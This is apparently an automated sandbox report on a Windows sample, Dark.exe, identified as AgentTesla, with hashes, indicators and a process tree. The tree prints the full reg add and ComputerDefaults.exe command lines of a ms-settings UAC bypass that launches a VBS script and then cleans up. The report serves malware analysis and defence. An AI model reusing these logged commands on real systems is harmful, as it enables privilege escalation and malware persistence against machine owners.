Analysis
-
max time kernel
11s -
max time network
13s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
29/08/2024, 18:53
Static task
static1
Behavioral task
behavioral1
Sample
Dark.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Dark.exe
Resource
win11-20240802-en
General
-
Target
Dark.exe
-
Size
2.2MB
-
MD5
b0c952e0a98835d76da62b3bd4cb7828
-
SHA1
eb7fb06d56bdf35a8d253debf56b4fad947d5505
-
SHA256
f722a7285a79f697284d7e376ea3122398c84be2a13eed2b2470ff03d752faad
-
SHA512
26b1654de14667ed5181e136cf70394f280c85758782e28fae86675e93466602f7fdd3d8c1efd0b4a70bb9ddc8be4e527e45797c433067935062c64465245d7c
-
SSDEEP
49152:/0X0AsmM6YOcXExsPq2QdGcrkEhsuC06aGHYxKGOoz:/tAsmy/y90V8oHlZ
Malware Config
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla payload 1 IoCs
resource yara_rule behavioral1/memory/220-24-0x0000000006070000-0x0000000006282000-memory.dmp family_agenttesla -
Executes dropped EXE 2 IoCs
pid Process 3636 Com.exe 220 DarkWare.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 raw.githubusercontent.com 6 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DarkWare.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS DarkWare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer DarkWare.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion DarkWare.exe -
Modifies registry class 11 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings\Shell\Open reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\414776.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\ms-settings reg.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 220 DarkWare.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 2828 wrote to memory of 3636 2828 Dark.exe 73 PID 2828 wrote to memory of 3636 2828 Dark.exe 73 PID 2828 wrote to memory of 220 2828 Dark.exe 74 PID 2828 wrote to memory of 220 2828 Dark.exe 74 PID 2828 wrote to memory of 220 2828 Dark.exe 74 PID 3636 wrote to memory of 4396 3636 Com.exe 75 PID 3636 wrote to memory of 4396 3636 Com.exe 75 PID 4396 wrote to memory of 1536 4396 cmd.exe 77 PID 4396 wrote to memory of 1536 4396 cmd.exe 77 PID 3636 wrote to memory of 1168 3636 Com.exe 78 PID 3636 wrote to memory of 1168 3636 Com.exe 78 PID 1168 wrote to memory of 3796 1168 cmd.exe 80 PID 1168 wrote to memory of 3796 1168 cmd.exe 80 PID 1168 wrote to memory of 528 1168 cmd.exe 81 PID 1168 wrote to memory of 528 1168 cmd.exe 81 PID 3636 wrote to memory of 1732 3636 Com.exe 82 PID 3636 wrote to memory of 1732 3636 Com.exe 82 PID 1732 wrote to memory of 4404 1732 cmd.exe 84 PID 1732 wrote to memory of 4404 1732 cmd.exe 84 PID 3636 wrote to memory of 3780 3636 Com.exe 85 PID 3636 wrote to memory of 3780 3636 Com.exe 85 PID 3636 wrote to memory of 4152 3636 Com.exe 87 PID 3636 wrote to memory of 4152 3636 Com.exe 87 PID 4152 wrote to memory of 432 4152 cmd.exe 89 PID 4152 wrote to memory of 432 4152 cmd.exe 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dark.exe"C:\Users\Admin\AppData\Local\Temp\Dark.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Users\Admin\AppData\Local\Temp\Com.exe"C:\Users\Admin\AppData\Local\Temp\Com.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵PID:1536
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\414776.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f3⤵
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\414776.vbs" /f4⤵
- Modifies registry class
PID:3796
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Modifies registry class
PID:528
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe4⤵PID:4404
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\414776.vbs3⤵PID:3780
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f3⤵
- Suspicious use of WriteProcessMemory
PID:4152 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Modifies registry class
PID:432
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"C:\Users\Admin\AppData\Local\Temp\DarkWare.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:220
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
-
Filesize
230KB
MD5f08723bcb5c94651b8df18a3ad027460
SHA1e9f855543aab8f383a34d6a738889034daa6b5a3
SHA256b8ca9e14e7adaa62220329b33138336146a2b3188215fcbd38365efc2f756460
SHA5123f647c85345e08d533d15a3fab7394da3caff2b4fdbaaa83946321312f3f17d5cba018309d4b2206f083f9fd90f568c27399932c2ae5ae79200a05d6dd0da589
-
Filesize
2.0MB
MD520f94ee7f660352e0c8a14810a183350
SHA11a39916394380b3ba2fba53249fa82ffc88e2876
SHA2567f14473c3d2bc352e829f2c15754cf8a41f43bbadd9413b5765c65913660a922
SHA512c1c4933d81234507cad12a524426e69096f28f710e61ad1a0cdb011567c6ca9b67bf24e2f74d87d1df8d7462de08add33bdbb0d4628efd4d55f6fe0bac96125e